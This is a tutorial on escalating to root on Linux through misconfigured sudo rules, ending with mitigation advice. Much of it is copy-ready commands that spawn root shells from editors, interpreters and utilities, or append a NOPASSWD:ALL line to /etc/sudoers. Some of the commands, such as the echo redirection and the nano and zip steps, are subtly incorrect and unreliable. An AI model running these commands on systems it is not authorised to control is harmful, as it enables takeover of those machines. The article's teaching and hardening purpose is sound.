Table of Contents
Abusing Sudo Binaries
Abusing Sudo Binaries is a well-known privilege escalation technique in Linux systems. It exploits misconfigurations in the sudo command, allowing a user with limited privileges to execute specific binaries as a higher-privileged user, typically root. If such binaries are improperly restricted, they can be leveraged to gain unauthorized access or escalate privileges.
This technique is often used in post-exploitation scenarios where an attacker, with limited access to a system, attempts to escalate privileges to gain full control.
Detailed Workflow
1. Enumerating Sudo Permissions
The first step is to determine which binaries the user can execute with sudo. Use the following command:
sudo -lExample Output:
User amr may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/vim
(ALL) NOPASSWD: /usr/bin/python3
(ALL) NOPASSWD: /usr/bin/awkKey Points:
NOPASSWD: No password is required to execute the command.(ALL): The command can be run as any user, includingroot.
2. Exploiting the Allowed Binaries
Certain binaries allow you to execute commands, spawn a shell, or modify system files. Here are some examples:
Examples of Exploitable Binaries
Interactive Shells
Some binaries allow you to directly spawn a shell.
- bash:
sudo bash- sh:
sudo shText Editors
Many text editors have built-in commands to execute shell commands.
- vim:
sudo vim -c ':!bash'- nano:
Innano, pressCtrl+Rfollowed byCtrl+Xto execute commands:
sudo nanoThen type:
!/bin/bash- less:
sudo less /etc/hostsPress ! and type:
bashScripting Languages
Scripting languages like Python, Perl, and Ruby can execute system commands.
- Python:
sudo python -c 'import os; os.system("/bin/bash")'- Perl:
sudo perl -e 'exec "/bin/bash";'- Ruby:
sudo ruby -e 'exec "/bin/bash";'System Utilities
Some utilities allow command execution or file manipulation.
- awk:
sudo awk 'BEGIN {system("/bin/bash")}'- find:
sudo find / -exec /bin/bash \;- tar:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash- zip:
sudo zip exploit.zip /tmp -T --unzip-command="sh -c /bin/bash"Exploiting File Access
If a binary allows editing system-critical files, it can be used to escalate privileges.
- echo:
sudo echo "amr ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers- tee:
echo "amr ALL=(ALL) NOPASSWD:ALL" | sudo tee -a /etc/sudoersUsing GTFOBins for Exploitation
The GTFOBins database is an excellent resource to identify exploitable binaries. It provides ready-to-use commands for privilege escalation based on the binary’s functionality.
Steps:
- Visit the GTFOBins website.
- Search for the binary listed in
sudo -l. - Follow the provided exploitation commands.
Real-World Scenarios
Scenario 1: Exploiting vim
A user has sudo permissions for /usr/bin/vim:
sudo vim -c ':!bash'This spawns a root shell.
Scenario 2: Exploiting find
A user can run find with sudo:
sudo find / -exec /bin/bash \;This command uses find to execute a root shell.
Scenario 3: Editing Sensitive Files
If sudo tee is allowed:
echo "amr ALL=(ALL) NOPASSWD:ALL" | sudo tee -a /etc/sudoersThis grants the user full sudo privileges.
Mitigation Strategies
Limit Sudo Permissions
- Avoid using
ALLorNOPASSWDfor binaries unless absolutely necessary. - Only allow specific, non-exploitable commands.
Use NOEXEC
Prevent certain binaries from spawning subshells by enabling NOEXEC in the sudoers configuration:
Defaults!/usr/bin/vim noexecAudit Sudo Configurations
Regularly review the /etc/sudoers file and related configurations to identify and remove unnecessary permissions.
Enforce Principle of Least Privilege
Grant users the minimum privileges required to perform their tasks.
Monitor Sudo Usage
Use logging and monitoring tools to track sudo commands executed by users.
Conclusion
Abusing sudo binaries demonstrates the importance of secure configuration management and strict privilege control. By understanding how these techniques work and implementing proper mitigation strategies, system administrators can significantly reduce the risk of privilege escalation attacks.